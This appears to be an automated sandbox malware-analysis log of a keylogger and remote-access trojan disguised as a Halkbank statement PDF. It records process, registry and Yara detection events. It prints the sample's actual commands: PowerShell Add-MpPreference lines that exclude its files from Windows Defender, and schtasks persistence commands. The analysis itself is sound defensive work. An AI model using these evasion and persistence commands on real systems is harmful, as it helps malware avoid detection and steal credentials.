Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

Code function: 9_2_06FF9548 LdrInitializeThunk,

9_2_06FF9548

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe

Memory written: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected ReverseShell

Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uAHDaCgpWpsogA.exe PID: 1080, type: MEMORYSTR

Yara detected VIP Keylogger

